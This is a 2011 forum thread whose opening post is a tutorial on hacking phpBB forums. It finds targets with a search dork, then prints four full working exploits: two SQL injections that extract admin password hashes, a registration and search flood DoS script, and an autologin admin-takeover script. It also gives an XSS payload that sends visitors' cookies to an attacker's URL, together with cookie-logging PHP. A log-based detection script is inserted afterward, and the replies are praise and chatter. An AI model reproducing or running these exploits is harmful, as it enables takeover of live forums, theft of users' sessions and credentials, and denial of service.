THREAD: How to hack phpbb2 forums
  1. 04-08-2011, 08:44 PM
    Curt
    Former Staff
    2,437 Posts
    24,200 Reputation
    Oct 2009
    NextGenUpdate
    Before you guys say I copied this from another forum, I didn't; I made this about 4 months ago on another site I'm a super mod on. Proof - [link]

    OK so... in this little tutorial I will show you how to hack a phpBB v2.x or v3.x forum, and the best exploits, utils etc. for this:

    Here are the download links, I thought I'd post them for you.
    For 32-bit users click [link]
    For 64-bit users click [link]

    First, if you don't know how to use these exploits you need to download ActivePerl; here's a video tutorial on how to use them.


    1. Search for phpBB Forums

    First we have to search for a phpBB forum. For this go to [link] and type "Powered by phpBB" (this is called a dork). It will return a big amount of phpBB forums. Choose one and enter.

    2. Find out what version it is

    The second step is to find out what version of phpBB the forum runs. For that we use the [url]www.site.com/forum/docs/CHANGELOG.html[/url] link,
    where site is the site name. Ex: [link]

    3. Finding good exploits

    Now that we know the forum version we go to [link] and search for phpBB v2 or v3 depending on what the forum version is. Here I'll give you some good exploits that I found:

    1. phpBB Remote Exploit 2.0.x

    #!/usr/bin/perl -w
    use strict;
    use IO::Socket;

    ## PROOF-OF-CONCEPT
    ## * works only with MySQL > 4.0 (needs UNION)
    ## * works only if the very first post on the forum has not been deleted
    ##
    ## Example:
    ## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
    ## [~] prepare to connect...
    ## [+] connected
    ## [~] prepare to send data...
    ## [+] OK
    ## [~] wait for response...
    ## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
    ##

    if (@ARGV < 4)
    {
        print "\n\n";
        print "|****************************************************************|\n";
        print " r57phpbb.pl\n";
        print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
        print " by RusH security team // www.rsteam.ru , https://rst.void.ru\n";
        print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
        print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
        print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
        print " [~] <server> - server ip\n";
        print " [~] <folder> - forum folder\n";
        print " [~] <user_id> - user id (2 default for phpBB admin)\n";
        print " [~] <search_id> - play with this value for results\n";
        print "|****************************************************************|\n";
        print "\n\n";
        exit(1);
    }

    my $success = 0;
    my ($server, $folder, $user_id, $search_id) = @ARGV;

    # The injected row is a PHP-serialised phpBB2 search-result array. phpBB
    # unserialize()s it and puts the single "split_search" word, which here is
    # the victim's user_password hash, into the &highlight= part of every topic
    # link it renders. Decoded, the two char() lists read:
    #   a:7:{s:14:"search_results";s:1:"1";s:17:"total_match_count";i:5;
    #        s:12:"split_search";a:1:{i:0;s:32:"<user_password>";}
    #        s:7:"sort_by";i:0;s:8:"sort_dir";s:4:"DESC";
    #        s:12:"show_results";s:6:"topics";s:12:"return_chars";i:200;}
    my $ser_head = 'char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,'
                 . '115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,'
                 . '105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,'
                 . '115,58,51,50,58,34)';
    my $ser_tail = 'char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,'
                 . '115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,'
                 . '115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)';
    my $query = "$search_id%20union%20select%20concat($ser_head,user_password,$ser_tail)"
              . "%20from%20phpbb_users%20where%20user_id=$user_id/*";

    print "[~] prepare to connect...\n";
    my $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => "$server",
        PeerPort => "80") || die "socket error $!";
    print "[+] connected\n";
    print "[~] prepare to send data...\n";
    # PROOF-OF-CONCEPT request (a Host header is sent so name-based vhosts answer)
    print $socket "GET /$folder/search.php?search_id=$query HTTP/1.0\r\nHost: $server\r\n\r\n";
    print "[+] OK\n";
    print "[~] wait for response...\n";
    while (my $answer = <$socket>)
    {
        # the hash comes back inside a link like viewtopic.php?t=1&amp;highlight=<hash>
        if ($answer =~ /;highlight=/)
        {
            $success = 1;
            my @result  = split(/;/, $answer);
            my @result2 = split(/=/, $result[1]);
            $result2[1] =~ s/&/ /g;
            print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
        }
    }
    if ($success == 0) { print "[-] exploit failed =(\n"; }

    ## o---[ RusH security team | www.rsteam.ru | 2003 ]---o


    2. phpBB 2.0.19 DoS Vulnerability

    #!/usr/bin/perl
    #######################################
    ## Recoded by: mix2mix and Elioni of https://ahg-khf.org
    ## And h4cky0u Security Forums (https://h4cky0u.org)
    ## Name: phpBBDoSReloaded
    ## Original Author: HaCkZaTaN of Neo Security Team
    ## Tested on phpBB 2.0.19 and earlier versions
    ## Ported to perl by g30rg3_x
    ## Date: 25/01/06
    #######################################
    use strict;
    use warnings;
    use IO::Socket;

    ## Loop counter
    my $x = 0;

    print q(
        phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
        Recoded by Albanian Hackers Group &
        h4cky0u Security Forums

    );
    print q(Host |without-> http://www.| );
    my $host = <STDIN>;
    chomp($host);

    print q(Path |example-> /phpBB2/ or /| );
    my $pth = <STDIN>;
    chomp($pth);

    ## "Visual Confirmation" is phpBB2's registration CAPTCHA: with it off the
    ## registration form can be flooded, with it on only the search form can be.
    print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
    my $type = <STDIN>;
    chomp($type);

    ## Send one HTTP POST to $uri with body $postit and close the connection
    ## (both flood types were copies of this block in the original).
    sub post_once {
        my ($uri, $postit) = @_;
        my $lrg = length $postit;
        my $sock = IO::Socket::INET->new(
            PeerAddr => $host,
            PeerPort => "80",
            Proto    => "tcp",
        );
        die "\nThe socket can't connect to the desired host, or the host is maybe already DoSed: $!\n" unless $sock;
        print $sock "POST $uri HTTP/1.1\r\n";
        print $sock "Host: $host\r\n";
        print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
        print $sock "Referer: $host\r\n";
        print $sock "Accept-Language: en-us\r\n";
        print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
        print $sock "Accept-Encoding: gzip, deflate\r\n";
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n";
        print $sock "Connection: Keep-Alive\r\n";
        print $sock "Cache-Control: no-cache\r\n";
        print $sock "Content-Length: $lrg\r\n\r\n";
        print $sock "$postit\n";
        close($sock);
        ## Print a "+" for every request
        syswrite STDOUT, "+";
    }

    ## Type 1: registration flood
    if ($type == 1) {
        ## User loop, 9999 times (enough for a flood xDDDD)
        while ($x != 9999) {
            ## Username that gets registered automatically: AHG__<x>
            my $uname = "username=AHG__" . "$x";
            ## E-mail that gets registered in the database: AHG__<x>@ahg-crew.org
            my $umail = "&email=AHG__" . "$x";
            my $postit = "$uname" . "$umail" . "%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
            ## Send through the socket the HTTP commands for registering a user on phpBB forums
            post_once("${pth}profile.php", $postit);
            $x++;
        }
    }
    ## Type 2: search flood
    elsif ($type == 2) {
        while ($x != 9999) {
            ## Final search string to send
            my $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
            ## Send through the socket a DB search into phpBB forums
            post_once("${pth}search.php?mode=results", $postit);
            $x++;
        }
    } else {
        ## WTF did you type
        die "Option not allowed +_-???\n";
    }



    1. phpBB 3 Remote SQL Injection Exploit

    #!/usr/bin/php -q
    <?php
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
    echo "by rgod rgod@autistici.org\n";
    echo "site: https://retrogod.altervista.org\n";
    echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

    /*
    works regardless of php.ini settings
    you need a global moderator account with "simple moderator" role
    */

    if ($argc<5) {
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
    echo "host:      target server (ip/hostname)\n";
    echo "path:      path to phpbb3\n";
    echo "user/pass: u need a valid user account with global moderator rights\n";
    echo "Options:\n";
    echo "  -T[prefix]   specify a table prefix different from default (phpbb_)\n";
    echo "  -p[port]:    specify a port other than 80\n";
    echo "  -P[ip:port]: specify a proxy\n";
    echo "  -u[number]:  specify a user id other than 2 (admin)\n";
    echo "  -x:          disclose table prefix through error messages\n";
    echo "Example:\n";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\n";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
    die;
    }

    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    // hex + ASCII dump helper, only used when debugging responses
    function quick_dump($string)
    {
      $result='';$exa='';$cont=0;
      for ($i=0; $i<=strlen($string)-1; $i++)
      {
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
        {$result.="  .";}
        else
        {$result.="  ".$string[$i];}
        if (strlen(dechex(ord($string[$i])))==2)
        {$exa.=" ".dechex(ord($string[$i]));}
        else
        {$exa.=" 0".dechex(ord($string[$i]));}
        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
      }
      return $exa."\r\n".$result;
    }
    $proxy_regex = '/(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b)/';
    // send one raw HTTP request, directly or through the proxy; the reply lands in $html
    function sendpacketii($packet)
    {
      global $proxy, $host, $port, $html, $proxy_regex;
      if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
      }
      else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
          echo 'No response from proxy...';die;
        }
      }
      fputs($ock,$packet);
      if ($proxy=='') {
        $html='';
        while (!feof($ock)) {
          $html.=fgets($ock);
        }
      }
      else {
        $html='';
        // read byte by byte until the proxy closes or the header block is complete
        while ((!feof($ock)) or (strpos($html,"\r\n\r\n") === false)) {
          $html.=fread($ock,1);
        }
      }
      fclose($ock);
      #debug
      #echo "\r\n".$html;
    }

    $host=$argv[1];
    $path=$argv[2];
    $user=$argv[3];
    $pass=$argv[4];
    $port=80;
    $prefix="PHPBB_";
    $user_id="2";//admin
    $discl=0;
    $proxy="";
    // options come after the four positional arguments
    for ($i=5; $i<=$argc-1; $i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if ($temp=="-p")
    {
      $port=str_replace("-p","",$argv[$i]);
    }
    if ($temp=="-P")
    {
      $proxy=str_replace("-P","",$argv[$i]);
    }
    if ($temp=="-T")
    {
      $prefix=str_replace("-T","",$argv[$i]);
    }
    if ($temp=="-u")
    {
      $user_id=str_replace("-u","",$argv[$i]);
    }
    if ($temp=="-x")
    {
      $discl=1;
    }
    }

    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    // the socket is plain text on $port, so the absolute URI handed to a proxy is http://
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    // log in with the moderator account and keep the session cookies
    $data="username=".urlencode($user);
    $data.="&password=".urlencode($pass);
    $data.="&redirect=index.php";
    $data.="&login=Login";
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
    $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Accept-Encoding: text/plain\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    $cookie="";
    $temp=explode("Set-Cookie: ",$html);
    for ($i=1; $i<=count($temp)-1; $i++)
    {
    $temp2=explode(" ",$temp[$i]);
    $cookie.=" ".$temp2[0];
    }
    if (preg_match("/_u=1;/i",$cookie))
    {
    //echo $html."\n";//debug
    //die("Unable to login...");
    }
    echo "cookie -> ".$cookie."\r\n";

    // POST the injected value as memberlist.php's "ip" search field; reply in $html
    function memberlist_search($sql)
    {
      global $p, $host, $cookie, $html;
      $sql=urlencode(strtoupper($sql));
      $data="username=";
      $data.="&icq=";
      $data.="&email=";
      $data.="&aim=";
      $data.="&joined_select=lt";
      $data.="&joined=";
      $data.="&yahoo=";
      $data.="&active_select=lt";
      $data.="&active=";
      $data.="&msn=";
      $data.="&count_select=eq";
      $data.="&count=";
      $data.="&jabber=";
      $data.="&sk=c";
      $data.="&sd=a";
      $data.="&ip=".$sql;
      $data.="&search_group_id=0";
      $data.="&submit=Search";
      $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
      $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
      $packet.="Host: ".$host."\r\n";
      $packet.="Content-Length: ".strlen($data)."\r\n";
      $packet.="Connection: Close\r\n";
      $packet.="Cookie: ".$cookie."\r\n\r\n";
      $packet.=$data;
      sendpacketii($packet);
    }

    if ($discl)
    {
    $sql="'suntzuuuuu";
    echo "sql -> ".$sql."\n";
    memberlist_search($sql);
    // the MySQL error message echoes the table name, which carries the prefix
    if (strstr($html,"You have an error in your SQL syntax"))
    {
    $temp=explode("posts",$html);
    $temp2=explode(" ",$temp[0]);
    $prefix=strtoupper($temp2[count($temp2)-1]);
    echo "prefix -> ".$prefix."\n";sleep(2);
    }
    }

    // boolean-blind extraction of one column, one byte at a time: a member row
    // comes back when the injected IF() is true, "No members found" otherwise
    function blind_extract($column, $alphabet, $label)
    {
      global $prefix, $user_id, $html;
      $j=1;$value="";
      while (!strstr($value,chr(0)))   // ASCII('') = 0 once we run past the end
      {
        for ($i=0; $i<=255; $i++)
        {
          if (!in_array($i,$alphabet)) continue;
          $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(".$column.",".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
          echo "sql -> ".$sql."\n";
          memberlist_search($sql);
          if (!strstr($html,"No members found for this search criteria")) {$value.=chr($i);echo $label." -> ".$value."[???]\r\n";sleep(2);break;}
        }
        // the for loop leaves $i at 256 when no byte matched
        if ($i>255) {die("Exploit failed...");}
        $j++;
      }
      return $value;
    }

    $md5s[0]=0;//null
    $md5s=array_merge($md5s,range(48,57)); //numbers
    $md5s=array_merge($md5s,range(97,102));//a-f letters
    // a hex-only alphabet assumes a 32-char MD5 in USER_PASSWORD; phpBB 3.0 final
    // stores phpass "$H$..." hashes, which this alphabet cannot spell
    $password=blind_extract("USER_PASSWORD",$md5s,"password");
    $admin=blind_extract("USERNAME",range(0,255),"username");

    echo "--------------------------------------------------------------------\r\n";
    echo "admin          -> ".$admin."\r\n";
    echo "password (md5) -> ".$password."\r\n";
    echo "--------------------------------------------------------------------\r\n";

    function is_hash($hash)
    {
    if (preg_match("/^[a-f0-9]{32}/",trim($hash))) {return true;}
    else {return false;}
    }

    if (is_hash($password)) {echo "Exploit succeeded...";}
    else {echo "Exploit failed...";}
    ?>



    2. XSS phpBB 3.0


    Open a text editor such as Notepad

    Enter the following script:

    <script>document.location.replace('https://WWW.SITOWEB/FILE.php?c=' + document.cookie);</script>

    Save the file as img.gif (.GIF)

    When you are posting, go down to "Attachment uploading"

    Upload your image.

    Now at the bottom is "Posted attachments" and under it your inserted image, e.g. ciao.gif

    Now take the direct link of the image. E.g.:

    https://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif
    Now you just have to disguise the link

    Example:

    [url=https://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif]Bella girl[/url]

    Now all those who use Internet Explorer as their browser and visit your link...
    You get their cookies.

    Log cookies (File.php)

    <?php
    $ip        = $_SERVER['REMOTE_ADDR'];
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $accept    = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $referer   = $_SERVER['HTTP_REFERER'];   // assumed for the "URL:" line, as the alternative logger below records the referer
    $cookie    = $_GET['c'];
    $myemail   = "YOUR E-MAIL";
    $date      = date("l, j F, Y, g:i a");
    $subject   = "Xss phpBB 3";
    $message   = "Xss phpBB 3 () 2006\n"
               . "Ip: $ip\n"
               . "Cookies: $cookie\n"
               . "Browser: $userAgent\n"
               . "Language: $accept\n"
               . "URL: $referer\n"
               . "Day & Time: $date\n";
    $from = "From: $myemail\r\n";
    mail($myemail, $subject, $message, $from);
    ?>

    **************************************
    Change: $myemail = "YOUR E-MAIL";

    Eg: [email]tua@mail.com[/email]
    **************************************

    Log cookies Alternative (File.php)

    <?php
    $cookie  = $_GET['c'];
    $ip      = getenv('REMOTE_ADDR');
    $date    = date("j F, Y, g:i a");
    $referer = getenv('HTTP_REFERER');
    $fp = fopen('file.txt', 'a');
    fwrite($fp, 'Cookie: ' . $cookie . '<br>IP: ' . $ip . '<br>Date and Time: ' . $date . '<br>Referer: ' . $referer . '<br><br><br>');
    fclose($fp);
    ?>


    OK, I wasn't too sure about releasing this Perl script because it's very accurate and works 90% of the time in getting you admin rights. But like I said, it's for educational purposes only. Code below, please don't make me regret this.

    #!/usr/bin/perl -w

    # phpBB <=2.0.12 session autologin exploit
    # This script uses the vulnerability in the autologinid variable
    # Just gives a user on a vulnerable forum administrator rights.
    # You should register the user before using this..
    # Moded and fixed by Puri

    use strict;
    use LWP::UserAgent;
    use HTTP::Cookies;

    if (@ARGV < 3)
    {
    print q(
    #-----------------------------------------------------------#
    # phpBB2 Exploit (Admin Rights)- Moded and Fixed by Puri #
    #-----------------------------------------------------------#
    # Usage: [website] [folder] [username] [proxy] #
    #-----------------------------------------------------------#
    #-----------------------------------------------------------#
    # Normal #
    #-----------------------------------------------------------#
    # Example 1: phpbb2.pl www.site.com / Puri #
    # Example 2: phpbb2.pl www.site.com /forum/ Puri #
    # Example 3: phpbb2.pl www.site.com /board/ Puri #
    # Example 4: phpbb2.pl www.site.com /phpbb/ Puri #
    # Example 5: phpbb2.pl www.site.com /phpbb2/ Puri #
    #-----------------------------------------------------------#
    # With Proxy #
    #-----------------------------------------------------------#
    # Proxy 1: phpbb2.pl www.site.com / Puri 127.0.0.1:80 #
    # Proxy 2: phpbb2.pl www.site.com /forum/ Puri 127.0.0.1:80 #
    #-----------------------------------------------------------#
    );
    exit;
    }

    my $host = $ARGV[0];
    my $path = $ARGV[1];
    my $user = $ARGV[2];
    my $proxy = $ARGV[3];
    my $request = "http://" . $host . $path;

    my $browser = LWP::UserAgent->new ();
    my $cookie_jar = HTTP::Cookies->new( );
    $browser->cookie_jar( $cookie_jar );
    # phpbb2mysql_data decodes to a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
    # phpBB <= 2.0.12 compares the unserialised autologinid with the stored password
    # hash using a loose ==, and boolean true == any non-empty string in PHP, so
    # the session is accepted as user id 2 (the default admin) without a password.
    $cookie_jar->set_cookie( "0", "phpbb2mysql_data",
        "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A" . "%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
        "/", $host, undef, undef, undef, undef, undef );
    if ( defined $proxy) {
        $proxy =~ s{^http://}{};
        $browser->proxy("http" , "http://$proxy");
    }
    print "++++++++++++++++++++++++++++++++++++\n";
    print "Connect to $host$path"; if ($proxy) {print " using proxy $proxy";}

    my $response = $browser->get($request);
    die "Error: ", $response->status_line
        unless $response->is_success;

    # the page only contains "phpbbprivmsg" when the forum accepted the session as logged in
    if($response->content =~ m/phpbbprivmsg/) {
        print "\n Forum is easy to hack, lets do it!\n";
    } else {
        print "Sorry... cant hack this site."; exit();}

    print "\nGet $user ID\n";
    $response->content =~ /sid=([\w\d]*)/;
    my $sid = $1;

    # admin_ug_auth.php is the ACP's user permissions page; look the user up first
    $request .= "admin/admin_ug_auth.php?mode=user&sid=$sid";
    $response = $browser->post(
        $request,
        [
            'username' => $user,
            'mode' => 'edit',
            'mode' => 'user',
            'submituser' => 'Look+up+User'
        ],
    );
    die "Error: ", $response->status_line
        unless $response->is_success;

    if ($response->content =~ /name="u" value="([\d]*)"/)
    {print " Done... ID=$1\n\n";}
    else {print "No user $user found..."; exit(); }
    my $uid = $1;
    print "Will give $user admin rights\n";

    # then submit the permissions form with userlevel=admin for that id
    $response = $browser->post(
        $request,
        [
            'userlevel' => 'admin',
            'mode' => 'user',
            'adv'=>'',
            'u'=> $uid,
            'submit'=> 'Submit'
        ],
    );
    die "Error: ", $response->status_line
        unless $response->is_success;
    print " Done! $user have admin rights now!\n";


    Hope my little tutorial helped you, it sure helped me; please don't abuse this.


    -Curt
    Last edited by Curt ; 04-14-2011 at 03:24 PM. Reason: Adding a new perl.


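From the defender's side, two of the attacks in the post above are visible in an ordinary web-server access log: the search_id UNION injection travels in the query string, and both flood modes of the DoS script are bursts of POSTs to profile.php or search.php from one address. This added example (mine, not the post's code) runs that detection over a few constructed Apache combined-format lines; the IPs, timestamps and thresholds are made up.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# UNION ... SELECT, a char(n,n,...) list, or an SQL comment opener
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|\bchar\(\d+(?:,\d+)+\)|/\*", re.I)


def parse_line(line):
    """Apache combined log line -> dict, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "target": target, "status": int(status)}


def sqli_params(target):
    """Names of query-string parameters whose value carries injection tokens.
    parse_qsl decodes once; unquote_plus again catches double encoding."""
    query = urlsplit(target).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if SQLI_RE.search(unquote_plus(v))]


def detect(lines, flood_threshold=5):
    """Return (kind, ip, path, detail) findings for injection and POST floods."""
    findings = []
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        hits = sqli_params(rec["target"])
        if hits:
            findings.append(("sqli", rec["ip"], path, ",".join(hits)))
        if rec["method"] == "POST" and path.endswith(("profile.php", "search.php")):
            minute = rec["time"].strftime("%Y-%m-%d %H:%M")
            posts[(rec["ip"], path, minute)].append(rec["time"])
    for (ip, path, minute), times in posts.items():
        if len(times) >= flood_threshold:
            findings.append(("flood", ip, path, "%d POSTs in minute %s" % (len(times), minute)))
    return findings


# Constructed sample: one injection, two benign requests, one registration burst.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Apr/2011:20:44:01 +0000] "GET /phpBB2/search.php?search_id=2%20union%20select%20concat(char(97,58),user_password)%20from%20phpbb_users%20where%20user_id=2/* HTTP/1.0" 302 0 "-" "-"
10.0.0.9 - - [08/Apr/2011:20:44:03 +0000] "GET /phpBB2/search.php?search_id=1812&start=0 HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Apr/2011:20:44:10 +0000] "GET /phpBB2/viewtopic.php?t=1&highlight=unionized+selection HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""" + "".join(
    '10.0.0.7 - - [08/Apr/2011:20:45:%02d +0000] "POST /phpBB2/profile.php HTTP/1.1" 200 311 "-" "-"\n' % s
    for s in range(6))


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(finding)
```

The memberlist.php injection in rgod's script is not catchable this way: the payload is in the POST body, which access logs do not record. For that you need request-body logging (a ModSecurity audit log, for instance) or the application's own SQL error reporting, where the "You have an error in your SQL syntax" messages the script looks for also show up.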
  3. 04-08-2011, 08:47 PM
    Acerman
    Gym leader
    298 Posts
    483 Reputation
    Mar 2011
    NextGenUpdate
    I can vouch that he didn't copy and paste ;)
  4. 04-08-2011, 08:47 PM
    spf357
    Do a barrel roll!
    138 Posts
    274 Reputation
    Dec 2009
    NextGenUpdate
    Curt, you supply us with the best tutorials around here.
  5. 04-08-2011, 08:48 PM
    MikeOxBig
    519 Posts
    2,545 Reputation
    Aug 2010
    NextGenUpdate
    VM me for +rep tomorrow, I'm all out.
  6. 04-08-2011, 08:54 PM
    Curt
    Former Staff
    2,437 Posts
    24,200 Reputation
    Oct 2009
    NextGenUpdate
    Originally Posted by spf357
    Curt, you supply us with the best tutorials around here.


    I'm just trying to help lol, thanks ;)

    ---------- Post added at 09:54 PM ---------- Previous post was at 09:53 PM ----------

    Originally Posted by MikeOxBig
    VM me for +rep tomorrow, I'm all out.


    Na, I'm not bothered about rep lol, just trying to share my knowledge :y:
  7. 04-09-2011, 01:03 AM
    Sigma
    VAMP
    2,558 Posts
    6,983 Reputation
    Jan 2011
    NextGenUpdate
    Thanks for the tut bro.
  8. 04-09-2011, 01:41 AM
    Kylee.
    Banned
    2,159 Posts
    6,063 Reputation
    Aug 2010
    NextGenUpdate
    What are you doing on another site anyway :( I know what you're doing!
    You're getting stuff from here then leaking it there :(
  9. 04-09-2011, 01:54 AM
    Curt
    Former Staff
    2,437 Posts
    24,200 Reputation
    Oct 2009
    NextGenUpdate
    Originally Posted by MomasGirlOnline
    What are you doing on another site anyway :( I know what you're doing!
    You're getting stuff from here then leaking it there :(


    LOL! MGO you know me too well :eek:, jokes. I've been on that site since like September haha and I'm a super mod so yeah.... I just decided to post it here as well cos I was going through my threads the other day; I thought it would have been posted here before but I guess not :rolleyes:. So that's why I posted it =D
  10. 04-09-2011, 02:00 AM
    Kylee.
    Banned
    2,159 Posts
    6,063 Reputation
    Aug 2010
    NextGenUpdate
    Originally Posted by Curt
    LOL! MGO you know me too well :eek:, jokes. I've been on that site since like September haha and I'm a super mod so yeah.... I just decided to post it here as well cos I was going through my threads the other day; I thought it would have been posted here before but I guess not :rolleyes:. So that's why I posted it =D


    Cheating on us with another site :cry: not on Curt ;)
  11. 04-09-2011, 02:06 AM
    Curt
    Former Staff
    2,437 Posts
    24,200 Reputation
    Oct 2009
    NextGenUpdate
    Originally Posted by MomasGirlOnline
    Cheating on us with another site :cry: not on Curt ;)


    I replied to this somewhere else, you'll know where once the time comes ;)